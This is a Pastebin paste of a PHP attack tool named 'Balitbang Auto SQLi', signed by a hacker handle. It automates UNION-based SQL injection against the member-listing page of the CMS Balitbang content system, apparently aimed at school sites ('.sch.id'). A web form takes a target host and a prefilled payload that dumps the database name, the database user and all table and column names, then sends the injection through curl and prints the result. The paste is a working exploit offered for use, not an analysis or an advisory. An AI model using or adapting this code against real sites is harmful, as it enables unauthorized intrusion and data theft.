ToKeiChun

CMS Balitbang Auto SQL Injection

Jul 16th, 2019
376
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.65 KB | None | 0 0
  1. <?php
  2. echo "
  3. <title>Balitbang Auto SQLi</title>
  4. <style>
  5. body {
  6. background-image:url(https://ak8.picdn.net/shutterstock/videos/31110058/thumb/1.jpg);
  7. background-repeat: no-repeat;
  8. background-size: 100% 100%;
  9. }</style><center>
  10. <pre><body bgcolor='white'><font color='black' size='4'>
  11. ####################
  12. # Martabak Auto #
  13. # Balitbang Inject #
  14. ####################
  15. Coded By Cy#b3r00T - AnarchoXploit
  16. <form action='' method='POST'>
  17. Target : <input type='text' name='target' placeholder='target.sch.id'>
  18. <textarea cols='50' rows='10' name='sqli'>concat(0x3c2f613e,database(),0x3c62723e,user(),(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)))</textarea>
  19. Note : concat(0x3c2f613e,command);
  20.  
  21. <input type='submit' name='inject' value='Inject'>
  22. </form></center><hr size='1'>";
  23. if(isset($_POST['inject'])){
  24. $target=$_POST['target'];
  25. $sqli=$_POST['sqli'];
  26. echo "<font size='3'>Url : http://$target<br>Command : $sqli<br><br> Output : ";
  27. $ch = curl_init();curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_URL, "http://$target/member/listmemberall.php");curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, "queryString=hantu%'/**/union/**/select/**/$sqli,version()-- -");curl_setopt($ch, CURLOPT_TIMEOUT, 3);curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);curl_setopt($ch, CURLOPT_VERBOSE, true);$buf = curl_exec ($ch);curl_close($ch);
  28. unset($ch);
  29. sleep(1);
  30. echo "$buf";
  31. }
  32. ?>
Add Comment
Please, Sign In to add comment